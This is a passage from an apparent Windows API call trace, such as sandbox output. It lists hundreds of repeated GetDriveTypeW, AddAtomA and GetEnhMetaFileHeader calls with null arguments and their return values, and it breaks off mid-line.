[0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.444] AddAtomA (lpString=0x0) returned 0x0 [0099.444] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.444] AddAtomA (lpString=0x0) returned 0x0 [0099.444] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.444] AddAtomA (lpString=0x0) returned 0x0 [0099.444] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.444] AddAtomA (lpString=0x0) returned 0x0 [0099.444] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.444] AddAtomA (lpString=0x0) returned 0x0 [0099.444] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.444] AddAtomA (lpString=0x0) returned 0x0 [0099.444] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.444] AddAtomA (lpString=0x0) returned 0x0 [0099.444] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.444] AddAtomA (lpString=0x0) returned 0x0 [0099.444] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.444] AddAtomA (lpString=0x0) returned 0x0 [0099.444] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.444] AddAtomA (lpString=0x0) returned 0x0 [0099.444] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.444] AddAtomA (lpString=0x0) returned 0x0 [0099.444] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.444] AddAtomA (lpString=0x0) returned 0x0 [0099.444] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.444] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.447] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.447] AddAtomA (lpString=0x0) returned 0x0 [0099.447] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.447] AddAtomA (lpString=0x0) returned 0x0 [0099.447] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.447] AddAtomA (lpString=0x0) returned 0x0 [0099.447] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.447] AddAtomA (lpString=0x0) returned 0x0 [0099.447] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.447] AddAtomA (lpString=0x0) returned 0x0 [0099.447] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.447] AddAtomA (lpString=0x0) returned 0x0 [0099.447] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.447] AddAtomA (lpString=0x0) returned 0x0 [0099.447] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.447] AddAtomA (lpString=0x0) returned 0x0 [0099.447] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: 